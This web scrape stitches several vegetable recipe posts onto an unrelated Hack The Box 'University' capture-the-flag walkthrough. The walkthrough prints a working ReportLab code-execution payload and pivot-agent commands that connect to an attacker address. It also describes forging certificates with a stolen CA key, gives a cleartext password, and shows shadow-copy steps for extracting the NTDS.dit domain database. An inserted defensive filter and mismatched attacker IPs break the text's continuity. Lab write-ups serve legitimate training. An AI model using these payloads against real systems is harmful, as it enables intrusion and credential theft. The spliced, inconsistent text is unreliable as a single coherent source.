Roasted Whole Sweet Potato

By: Charlie

Sweet potatoes are my go-to side dish because they’re incredibly forgiving and always delicious. Roasting them whole is the simplest method—no peeling or chopping required. They’re perfect for weeknight dinners, holiday meals, or Sunday suppers. Serve them as a simple side with butter and salt, or load them up with toppings for an easy vegetarian […]

The post Roasted Whole Sweet Potato appeared first on Simply Meat Smoking.

Baked root vegetables

Why would you skip a platterful of colourful vegetables, that are a perfect side, salad or morning hash? Enjoy the starchy bites of roasted goodness.
It is a small respite from the numerous Indian festivals, and the chill in the air is still hanging around. Therefore, it is a perfect time to get that platter of baked root vegetables out. I like baked root vegetables a bit more than pan-roasted ones for the following reasons:
  • They are one-pot, so much less effort.
  • The starchier sweetness improves with baking, adding a ton more cozy feeling.
  • When I bake, my kitchen is warm at the same time.
  • It is a recipe that you can do as a big batch with minimal prep and have all week long in the fridge.
  • It pairs well with pasta, rice or any grains, can be rolled as wraps or made into a salad.

Ingredients for baked root vegetables.

The vegetables: the baked vegetable tray is one recipe that allows you so much flexibility in terms of what you can have. You can make it as colourful as you like or as monochrome as you prefer. Here is a list of vegetables I like to throw into the tray.

  • Sweet potatoes
  • Carrot
  • Turnip
  • Potato
  • Radish
  • Swedes
  • Beetroot

For roasting: Olive oil, salt and herbs are the ones that work. The herbs I have chosen are rosemary and oregano. You can use thyme or basil as well.

Let's make baked root vegetables

Baked vegetables are the best use of a roasting tray.

Prep the vegetables: choose starchy, tough vegetables to start with. Wash thoroughly. Cut them into big chunks or dice as you prefer. Keep the beets separately. The carrots, potato, sweet potato, radish, parsnip, swedes and turnip can all go together.

Coat them in flavours. Since the vegetables are going to be soft and bland, it is best to coat them with flavours. Sprinkle salt and pepper, drizzle oil and toss them well. For flavours I prefer to add fresh, sturdy herbs that just don't burn away. Rosemary, oregano and thyme are my first choice. Go with what feels natural to you. You can replace the pepper with chilli flakes if you like the heat. Let the vegetable mix sit while you preheat the oven.
Ensure that the beets are coated and kept separate.

Bake: preheat the oven at 180 degrees for 10 minutes. Place the vegetables on a roasting tray. Spread them out evenly. Poke pieces of beets into the gaps so they cook along. Roast the vegetables for 35 to 40 minutes at 180 degrees Celsius with both top and bottom heat. Halfway through the time, flip the vegetables over to ensure even roasting. After about 35 minutes the vegetables will be ready and fork tender. Remove from heat and take them straight to the table. Or cool and proceed for storage.

Meal prep and storage

The baked root vegetables are wonderful to add bulk to any meal or in the lunch box.

Is this a vegan recipe?

Baked root vegetable is an excellent vegan platter. It is filling, a mix of good healthy fibre and carbs and perfect for any vegan meal.

How to make baked root vegetables into a salad?

Once you have the baked veggies in meal prep you can have a hearty salad with it. For the dressing I prepare a generous mix of lemon and lime juice with some pepper and salt. Then you need some freshness. Chop up some tomatoes, a cucumber and a handful of oregano, mint and parsley. Add all this into the mixing bowl with double the quantity of baked vegetables. Pour the dressing over it. Toss well and serve immediately. They are great sides to meals and double up as salads. You can add a bunch to your breakfasts too, as a hash.

How do you ensure the beets don’t leach the colour all over?

There are a couple of ways you can achieve this. If you peel, chop and place the beets separately, then place them on the tray to bake, there will be zero leaching.
Another method is to ensure you add the beets right at the end, a quick toss in the oil and salt and straight into the oven.

Baked root vegetables

Course Main Dish
Cuisine Baking, gluten free, Vegan
Keyword pot luck recipes, vegetarian barbecue, Winter warmers
Prep Time 10 minutes
Cook Time 30 minutes
Servings 6

Equipment

  • baking trays
  • Cutting board
  • Knife

Ingredients

  • 3 medium sized carrots
  • 1 large sweet potato
  • 1 turnip
  • 1 swede
  • 1 large beetroot
  • 1 medium sized potato
  • 2 tbsp olive oil
  • salt to taste
  • 1 sprig rosemary
  • 5-7 leaves oregano

Instructions

  • Wash, peel and cut the vegetables into big chunks.
  • Add them to the baking tray.
  • Tuck in rosemary and oregano.
  • Sprinkle salt, drizzle olive oil and massage it in.
  • Preheat the oven at 180 degrees for 10 minutes.
  • Place the tray in the oven to bake.
  • Bake for 30 minutes.
  • About 15 minutes in turn the vegetables for even baking.
  • After 30 minutes, check if the vegetables are fork tender.
  • The vegetables are then ready to be served.

Other baked recipes from us that make a good mealprep

Baked whole cauliflower

Dried peas nuggets

Baked veggie sheek kebabs

Paneer puffs

Stay connected

Hope you enjoy making this batch of low effort baked root vegetables. When you make your batch using this recipe, do share your thoughts and improvements in the comments below.
Pin this for later.
Stay subscribed; see you in the next post.

Pumpkin & Potato in Mustard Oil

By: Rapti B

Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness. 

Calling all home cooks looking for quick and healthy weekday/weeknight meal ideas – add this pumpkin & potato in mustard oil dish to your repertoire! It’s the kind that comes together in a jiffy, requires just one spice (coz salt and turmeric powder are MUSTS and don’t count) and pairs well with rice or Indian bread of choice. 

The Pumpkin & Potato in Mustard Oil is a version of the Kumdo’r Chechki, a traditional Bengali side dish wherein the pumpkin is grated or (extremely) thinly sliced and slowly cooked in its own juices. It’s the kind of dish that celebrates the natural flavours of the vegetable. If you’d like to try a traditional chechki, head over to the recipe for Mulo Chechki (provided radishes are in season). 

Pumpkin & Potato in Mustard Oil | Copyright Image | From The Corner Table
Tips to remember for the Pumpkin & Potato in Mustard Oil 
  • Julienne the vegetables and try to maintain consistency in size; this helps all the food cook evenly. 
  • Remember to add the pumpkin later, as it cooks faster than potatoes. 
  • You can make this without the potato; just increase the amount of pumpkin.
  • Always use double the amount of pumpkin as it reduces when cooked.

Do let me know if you try this recipe! Leave a comment and don’t forget to tag me on Instagram at from.the.corner.table and hashtag it #fromthecornertable. I’d love to see it ❤

For regular updates on recipes, recommendations on things to read and watch and ramblings that make sense, subscribe to the newsletter – you’ll find the form in the sidebar if viewing on a screen and at the bottom if viewing on the phone. Since spamming or flooding your inbox is a huge no for me, these newsletters go out only when I’ve put up a new post or sometimes, once in a month only.

Pumpkin & Potato in Mustard Oil

Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.

  • 200 grams Pumpkin
  • 100 grams Potato
  • 1 medium Onion
  • 1 Green chilli
  • 1 tablespoon Mustard oil
  • ¼ teaspoon Nigella seeds
  • Salt (to taste)
  • ¼ teaspoon Turmeric Powder
  1. Peel and slice/julienne the pumpkin, potato and onion; keep them in separate bowls/plates.
  2. In a kadhai/deep pan, heat mustard oil.
  3. Once the oil is hot, add nigella seeds and green chilli.
  4. Let the nigella seeds splutter.
  5. Add the onion and potato; cover and cook on low flame for 2-3 minutes.
  6. Add the pumpkin, turmeric powder and salt to taste.
  7. Cover with a tight lid and let the vegetables cook in steam and moisture until the potato is cooked.
  8. Stir frequently to prevent the vegetables from sticking to the bottom of the vessel.
  9. Serve hot with roti/paratha or as a side dish with rice and dal.
Side
Bengali (Indian)
bengali cuisine, kalo jeere, kalonji, mashed potato, mustard oil, nigella seeds, pumpkin, spring onion

Roasted Potato Recipe | Crispy and Perfect

A roasted potato recipe in the oven to satisfy your crispy potato cravings. These Crispy Oven Roasted Potatoes are the ultimate quick party snack! This easy oven roasted potatoes recipe makes golden, crunchy potatoes with a soft, fluffy center.

All you need is a handful of ingredients and a few simple steps, which I am sharing along with tips for restaurant-level crunch right in your kitchen. I am sharing very simple tips to make the crispiest roast potatoes with a satisfying crunch.

These oven roasted potatoes are incredibly versatile, and a perfect side dish or appetizer for any occasion. Whether for a cozy dinner or your next gathering, everyone will love these roasted potatoes!

With a golden, crunchy crust on the outside and a soft, fluffy center, these roasted potatoes are everything you want in a potato snack.

Why You Should Try This Recipe:

  • Foolproof Recipe: This technique guarantees perfectly crispy roasted potatoes every time, even if you’re new to cooking.
  • Versatile Snack or Side Dish: Dress up the potatoes with different herbs, spices, and toppings for unique taste every time.
  • Healthy Alternative to Fried Potatoes: By roasting instead of frying, you’re using much less oil.
  • Quick Preparation: These require minimum prep time. Crispy potatoes are on the table in just about 40 minutes. Perfect for last-minute meal prep or spontaneous gatherings.
  • Budget-Friendly: Potatoes are an affordable ingredient, which makes this recipe a cost-effective option that doesn’t skimp on taste or quality.

Ingredients For Roasted Potato Recipe

  • Salt: Enhances the flavor and helps break down the potato’s surface to create that crispy outer layer.
  • Baking Soda: This is the secret weapon! The alkalinity helps break down the potato’s surface starch, which gives them that perfect crispy texture.
  • Russet or Yukon Gold Potatoes: These are ideal for roasting due to their starchy, fluffy interiors. Russets are best for extra crispiness, while Yukon Golds give a slightly creamier texture.
  • Olive Oil: Helps to roast the potatoes and allows them to crisp up evenly in the oven. We’re also infusing it with rosemary for added flavor!
  • Fresh Rosemary Leaves: Infuses the oil with aromatic, earthy flavors that complement the crispy potatoes.
  • Black Pepper: Adds a bit of heat and depth to the dish.
  • Parsley: Provides freshness and a pop of color as a final garnish.

How to Make Crispy Roast Potatoes In Oven

  • Step 1: Preparing the Potatoes Wash, peel, and cut russet or Yukon Gold potatoes into large chunks.
  • Step 2: Parboiling the Potatoes Bring water to a gentle boil, add salt and baking soda. Parboil potatoes for 10-15 minutes until they are slightly tender.
  • Step 3: Draining and Drying the Potatoes Drain the potatoes and let them sit for a few minutes to dry out.
  • Step 4: Making Herb-Infused Oil Heat olive oil with chopped rosemary, strain out the rosemary, and set aside.
  • Step 5: Coating the Potatoes Add the herb-infused oil, salt, and pepper to the potatoes. Shake the bowl to create a starchy coating on the surface of the potatoes.
  • Step 6: Roasting the Potatoes Spread potatoes on a baking tray in a single layer. Roast at 230°C for 15 minutes.
  • Step 7: Turning the Potatoes Take the potatoes out of the oven and flip them with a metal spatula, so that the other side can roast evenly.
  • Step 8: Final roast: Roast for an additional 5 minutes until golden and crispy. Finally, add crispy rosemary bits and freshly chopped parsley.

Substitutions You Can Make

  • You can swap the russet or Yukon Gold potatoes for sweet potatoes if you want a slightly sweeter flavor profile.
  • You can use avocado oil instead of olive oil for a different flavor or if you prefer a higher smoke point oil.
  • You can add garlic during the herb-infusing step for a roasted garlic flavor that pairs beautifully with crispy potatoes.
  • You can try thyme or oregano in place of rosemary if you’re looking for a slightly different herbaceous note.

Variations of Roasted Potato Recipe

  • Cheesy Garlic Potatoes: After roasting, sprinkle grated Parmesan or cheddar cheese over the potatoes and return them to the oven for a few minutes to melt the cheese.
  • Spicy Roasted Potatoes: Add a teaspoon of smoked paprika or cayenne pepper to the herb oil for a spicy kick.
  • Lemon Herb Potatoes: Squeeze some fresh lemon juice over the potatoes after roasting for a bright, zesty finish.
  • Truffle Potatoes: Drizzle a little truffle oil over the potatoes once they’re out of the oven for an indulgent, gourmet touch.
  • Loaded Baked Potatoes: Top the roasted potatoes with sour cream, green onions, and crumbled bacon for a hearty, loaded potato version.

Tips to Make the Best Crispy Roast Potato

  1. Don’t skip the parboiling: Parboiling softens the potatoes just enough to make them fluffy inside while leaving the outside ready to crisp up in the oven.
  2. Use a hot oven: Make sure your oven is preheated to a high temperature to guarantee crispy, golden-brown potatoes.
  3. Don’t overcrowd the pan: Spread the potatoes out in a single layer on the baking tray. If they’re too close together, they’ll steam instead of roasting.
  4. Shake the potatoes: Tossing the potatoes roughly after parboiling creates a starchy coating that leads to an extra crispy exterior when roasted.

Storing and Reheating

To store leftover roasted potatoes, transfer them to an airtight container and refrigerate them for up to three days. When reheating, it’s best to use the oven or an air fryer to restore their crisp texture. Avoid microwaving, as this will make them soggy. Simply spread the potatoes on a baking sheet and reheat them in a preheated oven at 200°C (400°F) for about 10 minutes, or until they’re crispy again.

Serving Suggestions

These crispy roasted potatoes are perfect served as a side dish for your favorite meals, whether it’s grilled chicken, steak, or a fresh salad. They also make a fantastic party snack, especially when served with a dip like this Labneh Tomato Dip, Tzatziki or even Guacamole.

For a fancier presentation, sprinkle over some extra herbs or add a drizzle of truffle oil right before serving.

FAQs

Can I make these potatoes in advance?

Yes! You can parboil the potatoes ahead of time and refrigerate them for up to 24 hours before roasting. This can actually make them even crispier.

Can I use a different type of potato?

Russet and Yukon Gold potatoes work best, but you can use red potatoes or fingerlings if needed. Just note that the texture may be slightly different.

Can I skip the baking soda?

Baking soda is key to breaking down the exterior of the potatoes, which creates that perfect crispy texture. You can skip it, but your potatoes may not be as crispy.

How do I store leftover roasted potatoes?

Store them in an airtight container in the fridge for up to 3 days. To reheat, place them in a hot oven or air fryer to restore their crispiness.

Can I freeze these potatoes?

Yes! Parboil the potatoes, then freeze them in a single layer. When ready to cook, roast them directly from frozen—just add a few extra minutes to the cooking time.

Easy Roast Potato Recipe | Oven Roasted Potatoes

Easy Roast potato recipe to make the perfect oven roasted potatoes! Crispy on the outside and fluffy on the inside, these potato snacks are ideal as a quick party snack or side dish everyone will love.
Course Appetizer, Side Dish
Cuisine American
Keyword easy to make, oven roasted potatoes, Quick party snack
Prep Time 15 minutes
Cook Time 25 minutes
Total Time 40 minutes
Servings 4 people
Calories 238kcal

Ingredients

  • 1 tsp salt
  • 1/2 teaspoon baking soda
  • 2 pounds russet or Yukon Gold potatoes
  • 2 tablespoons olive oil
  • rosemary leaves minced
  • ½ tsp black pepper Freshly ground
  • Parsley leaves (minced)

Instructions

  • Step 1: Preparing the Potatoes Wash, peel, and cut russet or Yukon Gold potatoes into large chunks.
  • Step 2: Parboiling the Potatoes Bring water to a gentle boil, add salt and baking soda. Parboil potatoes for 10-15 minutes until they are slightly tender.
  • Step 3: Draining and Drying the Potatoes Drain the potatoes and let them sit for a few minutes to dry out.
  • Step 4: Making Herb-Infused Oil Heat olive oil with chopped rosemary, strain out the rosemary, and set aside.
  • Step 5: Coating the Potatoes Toss the potatoes in the herb-infused oil, salt, and pepper. Shake the bowl to create a starchy coating on the surface of the potatoes.
  • Step 6: Roasting the Potatoes Spread potatoes on a baking tray in a single layer. Roast at 230°C for 15 minutes.
  • Step 7: Turning the Potatoes Flip the potatoes over, add crispy rosemary bits, and freshly chopped parsley.
  • Step 8: Final roast: Roast for an additional 5 minutes until golden and crispy.

Notes

  1. Don’t skip the parboiling: Parboiling softens the potatoes just enough to make them fluffy inside while leaving the outside ready to crisp up in the oven.
  2. Use a hot oven: Make sure your oven is preheated to a high temperature to guarantee crispy, golden-brown potatoes.
  3. Don’t overcrowd the pan: Spread the potatoes out in a single layer on the baking tray. If they’re too close together, they’ll steam instead of roasting.
  4. Shake the potatoes: Tossing the potatoes roughly after parboiling creates a starchy coating that leads to an extra crispy exterior when roasted.

Nutrition

Calories: 238kcal | Carbohydrates: 40g | Protein: 5g | Fat: 7g | Saturated Fat: 1g | Polyunsaturated Fat: 1g | Monounsaturated Fat: 5g | Sodium: 742mg | Potassium: 958mg | Fiber: 5g | Sugar: 2g | Vitamin A: 6IU | Vitamin C: 45mg | Calcium: 29mg | Iron: 2mg

Hack The Box: University Machine Walkthrough – Insane Walkthrough

By: darknite
Reading Time: 17 minutes

Introduction to University:

The “University” machine on Hack The Box is an insanely difficult Windows Active Directory (AD) challenge that simulates a complex enterprise network. It involves exploiting a web application vulnerability, forging certificates, pivoting through internal networks, and abusing AD privileges to achieve domain compromise. This walkthrough provides a detailed guide to capturing both user and root flags, inspired by comprehensive write-ups like ManeSec’s, with step-by-step commands, full outputs, and troubleshooting tips for all skill levels.

Objectives

  • User Flag: Exploit a ReportLab RCE vulnerability (CVE-2023-33733) in university.htb to gain access as wao, forge a professor certificate to authenticate as george, and upload a malicious lecture to compromise Martin.T.
  • Root Flag: Exploit a scheduled task to execute a malicious .url file, escalate privileges on WS-3 using LocalPotato (CVE-2023-21746), and abuse SeBackupPrivilege to extract NTDS.dit, obtaining the domain administrator’s hash.

Reconnaissance

Reconnaissance identifies services and attack vectors in the AD environment.

Initial Network Scanning

Scan all ports to map services.

Command:

nmap -sC -sV 10.10.11.39 -oA initial

Output:

# Nmap 7.94SVN scan initiated Sat May  3 21:19:17 2025 as: nmap -sC -sV -oA initial 10.10.11.39
Nmap scan report for 10.10.11.39
Host is up (0.020s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-04 07:59:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-04T07:59:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h39m48s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  3 21:19:55 2025 -- 1 IP address (1 host up) scanned in 38.67 seconds

Analysis:

  • Port 80: Runs Nginx 1.24.0, likely hosting the main web service and primary attack vector.
  • Ports 88, 389, 445, 464, 3268: Indicate this is a domain controller for the domain university.htb, with Kerberos, LDAP, SMB, and password services active.
  • Port 53: DNS service associated with Active Directory.
  • Port 5985: (Not listed in the scan but commonly present) Typically used for WinRM, enabling remote Windows management.

Web Exploitation

ReportLab RCE (CVE-2023-33733)

Exploit ReportLab’s RCE vulnerability in /profile’s PDF export to gain a wao shell.

When I accessed the web server, I saw a minimalistic and straightforward interface.

Navigating to the login page redirected us to an authentication portal. At this stage, no valid credentials were available, so progress could not continue.

Consequently, a new ‘Student’ account was created to further enumerate the application, given that this role appeared to be publicly accessible.

Random placeholder information filled the registration fields, as illustrated in the example above.

We enter the credentials we created earlier.

Once the user logs in successfully, the system displays a dashboard similar to the screenshot above.

The section labelled ‘Profile Export’ appeared promising for exploring potential functionality or vulnerabilities.

The PDF report uses a clear and concise format, modeled after the examples provided above.

Exploiting CVE-2023-33733: Remote Code Execution via ReportLab in university.htb

While analysing the PDF file, I identified it as a ReportLab-generated document, similar to those encountered during the SolarLab machine engagement.

During the SolarLab machine exercise, the exploitation process resembled the steps outlined below.

<para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('<command>') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

Therefore, the team retested the exploit on the current machine to confirm its applicability.
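
A defensive check for the payload shape shown above, added here as an example (it is not code from the original walkthrough or from ReportLab): the expression sits entirely inside a colour attribute, so a pre-render filter can reject any colour attribute that is not a plain literal, and escaping profile fields stops them from being parsed as paragraph markup at all. The field names, the sample records and the set of attribute names checked are assumptions.

```python
import re
from html.parser import HTMLParser
from xml.sax.saxutils import escape

# Plain colour literals only: a name such as "red" or a hex value such as "#ff0000".
SAFE_COLOR = re.compile(r"^(?:#[0-9a-fA-F]{3,8}|0x[0-9a-fA-F]{6,8}|[A-Za-z]{1,32})$")


class _ColorAttrScanner(HTMLParser):
    """Collect colour-like attributes whose value is not a plain colour literal."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # Assumption for this example: treat any attribute whose name ends in
            # "color" (color, backcolor, ...) or is "fg"/"bg" as a colour attribute.
            if name.endswith("color") or name in ("fg", "bg"):
                if not SAFE_COLOR.match(value or ""):
                    self.findings.append((tag, name, value or ""))


def find_unsafe_color_attrs(text):
    """Return (tag, attribute, value) for every colour attribute that is not a literal."""
    scanner = _ColorAttrScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def neutralise(text):
    """Escape &, < and > so the field is rendered as literal text, not markup."""
    return escape(text)


def audit(profiles, fields=("bio",)):
    """Return (username, field) pairs whose stored value carries an unsafe colour attribute."""
    flagged = []
    for profile in profiles:
        for field in fields:
            if find_unsafe_color_attrs(profile.get(field, "")):
                flagged.append((profile["username"], field))
    return flagged


# Constructed, inert sample: only the outer shape of the markup above, no working expression.
MALICIOUS_SHAPE = (
    "<para><font color=\"[ [ getattr(pow, '...') ] ] and 'red'\">exploit</font></para>"
)

# Constructed sample records; usernames and the "bio" field are hypothetical.
SAMPLE_PROFILES = [
    {"username": "student1", "bio": 'I like <font color="#0055aa">blue</font> ink.'},
    {"username": "student2", "bio": MALICIOUS_SHAPE},
    {"username": "student3", "bio": "Plain text, no markup."},
]

if __name__ == "__main__":
    for user, field in audit(SAMPLE_PROFILES):
        print(f"unsafe colour attribute in {field!r} of user {user!r}")
    print("escaped form:", neutralise(MALICIOUS_SHAPE))
```

Upgrading ReportLab to a release that fixes CVE-2023-33733 remains the actual remedy; the filter is a second layer and a way to find stored payloads during incident response.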

Let’s start our Python server listener.

The exploitation method follows the general approach illustrated below.

The profile was updated successfully.

A lack of response from the target indicated a failure.

It may be necessary to trigger the action by clicking the “Profile Export” button.

As expected, triggering the action returned a response.

We refined and updated the payload to achieve the intended outcome.

We received a response, but the file was missing.

Let’s start the listener.

We executed a Python3 reverse shell script to establish a callback connection.

Unfortunately, I received no response from the target.

I also conducted a test using a Base64-encoded PowerShell command.

Once again, there was no response from the target.

Troubleshooting and Resolution Steps on University machine

The team adjusted the command and subsequently tested its effectiveness.

The callback succeeded this time, returning the shell.py file from the server.

The result exceeded expectations.

Access was successfully obtained for user ‘wao’.

BloodHound enumeration

Since we are using a Windows machine, let’s proceed to analyse BloodHound.

There is a significant amount of information here.

WAO belongs to the Domain Users group, so it inherits the default permissions and access rights assigned to all standard users within the domain.

By examining the browse.w connection, we were able to gather a substantial amount of information.

Enumerate the machine as WAO access on the University machine

The only potentially valuable finding at this stage was db.sqlite3, which may contain database information.

In the CA directory, we found three important files: rootCA.crt, which is the root certificate; rootCA.key, the private key associated with the root certificate; and rootCA.srl, a file that tracks the serial numbers of issued certificates. These files are essential components for managing and validating the certificate authority’s trust chain.

Running the command icacls db.sqlite3 displays the access control list (ACL) for the file, showing the users and groups with permissions and the specific rights they hold. This information helps determine who can read, write, or execute the file, providing insight into the security and access restrictions applied to db.sqlite3.

SQLite database enumeration on university machine

Download the db.sqlite3 file to our local machine.

The screenshot above displays the available tables in the database.

Therefore, these hashes can be cracked at a later stage to uncover additional credentials.

Reviewing the Database Backups

We checked the DB-Backup directory and found a PowerShell script (.ps1 file) that might contain useful information.

Although the script doesn’t specify a username, it instead runs under the Windows account executing it, and therefore file and application access depend on that account’s permissions. For example, if the user cannot write to C:\Web\DB Backups\ or read db.sqlite3, then the backup will fail. Likewise, running external programs such as 7z.exe also requires the appropriate permissions.

After gaining access, I ran whoami /all and confirmed that the current user is wao. This matched the password I had earlier (WAO), which strongly indicates it belongs to this user. Although it’s not best practice, it’s common in misconfigured environments for usernames and passwords to be the same or closely related, which made the guess successful.

The term “Internal-VSwitch1” typically refers to a virtual switch created within a virtualization platform like Microsoft Hyper-V.

An “Internal” virtual switch in Hyper-V does not have an IP address itself; rather, the host’s virtual network adapter connected to that internal switch will have an IP address.

SeMachineAccountPrivilege and SeIncreaseWorkingSetPrivilege are disabled by the system, while SeChangeNotifyPrivilege remains enabled.

Let’s transfer the nmap binary to the victim’s machine

The team successfully executed the nmap scan on the victim’s machine

We encountered an error that required us to use the --unprivileged option for successful execution.

Unfortunately, the command still fails to work even after adding the --unprivileged option.

Therefore, at this point, let’s switch to using an alternative scanning tool like rustscan.

Finally, we successfully identified the open ports for the machines:

  • 192.168.99.12 has port [22] open.
  • 192.168.99.1 has ports [53, 80, 88, 593, 135, 139, 139, 445, 389, 636, 3268, 3269, 5985, 5985] open.
  • 192.168.99.2 has ports [135, 139, 139, 445, 5985, 5985] open.

Stowaway usage

Stowaway serves as a multi-hop proxy tool for security researchers and penetration testers.

It allows users to route external traffic through multiple nodes to reach the core internal network, effectively bypassing internal network access restrictions. Creating a tree-like network of nodes simplifies management and access within complex network environments.

The following commands are available to use:

On our machine 
./linux_x64_admin -l 10.10.16.38:2222 -s 111

On victim's machine
shell windows_x64_agent.exe -c 10.10.14.199:2222 -s 111

Upload the agent onto the victim’s machine.

Run the command I provided earlier.

If the connection is successful, it will appear as shown in the screenshot above.

Therefore, let’s perform port forwarding using the ports we identified earlier.

We can access WS-3 using the credentials obtained earlier.

Access as wao windows

Finally, we successfully gained access.

We also successfully accessed the LAB-2 environment.

The binary we discovered here indicates that we can escalate to root access easily without relying on an exploit.

I presume we have root access inside the Docker container.

Analyze the machine on University machine

Inside the README.txt file, the message reads:

Hello professors,

We have created this note for all users on the domain computers: WS-1, WS-2, and WS-3. These machines have not been updated since 10/29/2023. Since these devices are intended for content evaluation purposes, they must always have the latest security updates. Therefore, it is important to complete the current assessment before moving on to the "WS-4" and "WS-5" computers. The security team plans to begin updating and applying the new security policy early next month.

Kind regards,
Desk Team  Rose Lanosta

There’s nothing of interest that I found inside here related to the LAB-2 environment.

Automation-Scripts on University machine

There is an Automation-Scripts directory that could potentially contain malicious code.

There are two PowerShell (.ps1) files we can examine within the Automation-Scripts directory.

Unfortunately, all access attempts were denied.

The date is displayed above.

The Forgotten Campus – Rediscovering the University Web

The login page features a signed certificate.

A Certificate Signing Request (CSR) file is required to proceed further.

Execute the openssl req command.

A CSR file needs to be generated.

Use the following command to sign the CSR and generate the certificate:

openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out My-Certificate.crt -days 365 -sha256

This command takes the CSR file My-CSR.csr, signs it using the CA’s certificate and key (rootCA.crt and rootCA.key), creates a serial number file if it doesn’t exist (-CAcreateserial), and outputs the signed certificate as My-Certificate.crt valid for 365 days using SHA-256.

Finally, we have provided the george.pem file.

Access as George on dashboard

Use the george.pem file to attempt the login.

Finally, we successfully accessed the system as george.

It will inform you that the signed certificate appears unusual because it is missing. He will then ask you to request a new certificate by uploading the forged professor’s CSR created earlier. Clicking submit triggers the download of a signed document named Professor-Signed-CertificateMy-CSR.csr.

Log out again, then use the signed-cert.pem file to log back in. You should be able to click on “Create a New Course” without encountering any errors.

Create course on dashboard

You can now create a course—just write something, and after creating it, you will find an option at the bottom to add a new lecture.

Lastly, the Course Dashboard is displayed above.

The new course has been created successfully. Check out the Course Dashboard above to explore it.

There are three functions available within course preferences.

Let’s add a new lecture to the course.

Executing the command provided above.

Develop a malicious executable file.

Set up a new folder and upload the malicious file to it.

Generate the passphrase.

The command gpg -u george --detach-sign dark.zip utilizes GPG (GNU Privacy Guard) to generate a detached digital signature for the file dark.zip, ensuring its authenticity and integrity. By specifying the user ID “george” with the -u flag, the command employs George’s private key to create a separate signature file, typically dark.zip.sig, without modifying the original file.

Add a new course here.

The command gpg --export -a "george" > GPG-public-key.asc uses GPG (GNU Privacy Guard) to export the public key associated with the user ID “george” in ASCII-armored format (via the -a flag, making it human-readable text), and redirects the output to a file named GPG-public-key.asc. This file can then be shared for others to import and use for verifying signatures or encrypting messages intended for “george.”

Upload the file to the dashboard.

An error is displayed above stating “Invalid Lecture Integrity.”

Upload the public key here.

Upload the public key successfully

Start the listener in LAB-2.

Access as Martin.T on Lab-2 environment

After a short while, we successfully receive a reverse shell connection.

We successfully gained access to the system as the user martin.t

The user flag has been successfully retrieved.

We can read the user flag by typing type user.txt

Escalate to Root Privileges Access

Privileges Access

SeChangeNotifyPrivilege is currently enabled, while SeIncreaseWorkingSetPrivilege is disabled in this environment.

Investigate further on University machine

We can retrieve scheduled tasks using the Get-ScheduledTask command.

It has been saved as shown above

There are numerous tasks with the states ‘READY‘ and ‘DISABLED‘.

This system is a virtualized Windows Server 2019 Standard (64-bit) named WS-3, running on an AMD processor under Hyper-V. It has 1.5 GB RAM with limited available memory and is part of the university.htb domain. The server is not using DHCP, with a static IP of 192.168.99.2, and has three security updates installed. The environment runs on Hyper-V virtualization with a UEFI BIOS.

This PowerShell command retrieves all the actions associated with the scheduled task named “Content Evaluator(Professor Simulatorr)” and formats the output as a detailed list showing every property of those actions.

LocalPotato vulnerability

We attempted to execute the LocalPotato exploit, but unfortunately, it failed.

The exploit succeeded when executed using PowerShell

We extracted the system information onto the victim’s machine.

Access as Brose.w privileges

We successfully retrieved the password for the user: v3ryS0l!dP@sswd#X

Let’s access the machine as Brose.W using the credentials we obtained earlier.

All privileges are accessible on this account.

Create a new directory using the appropriate command.

Take advantage of diskshadow

This sequence of PowerShell commands creates a script file named diskshadow.txt for use with the DiskShadow utility, which manages shadow copies (Volume Shadow Copy Service). Each echo command writes a line to the script. The first line sets the shadow copy context to persistent and disables writers to prevent interference. The second line targets the C: volume and assigns it the alias temp. The third line creates the shadow copy, and the last line exposes it as a new drive (Z:) using the alias. This process provides read-only access to a snapshot of the C: drive at a specific point in time. It’s useful for accessing protected or locked files, such as registry hives or system files, without triggering security measures. This technique is often used in system administration and security contexts to safely extract sensitive data from live systems.

The command diskshadow.exe /s c:\zzz\diskshadow.txt runs the DiskShadow utility with a script that creates a persistent shadow copy of the C: drive, assigns it an alias, and exposes it as a new drive for read-only access. This lets users access a snapshot of the drive at a specific time, bypassing file locks and permission restrictions. It’s commonly used in post-exploitation to extract sensitive files like registry hives or credentials without triggering security alerts.

SeBackupPrivilege exploit

Identified a website that can potentially be leveraged for privilege escalation.

Upload both files to the victim’s machine.

These commands import modules that enable backup privilege functionality, then use that privilege to copy the sensitive NTDS.dit file—a database containing Active Directory data—from the shadow copy (Z:) to a local directory (C:\dark). This technique allows extraction of critical directory data typically protected by system permissions.
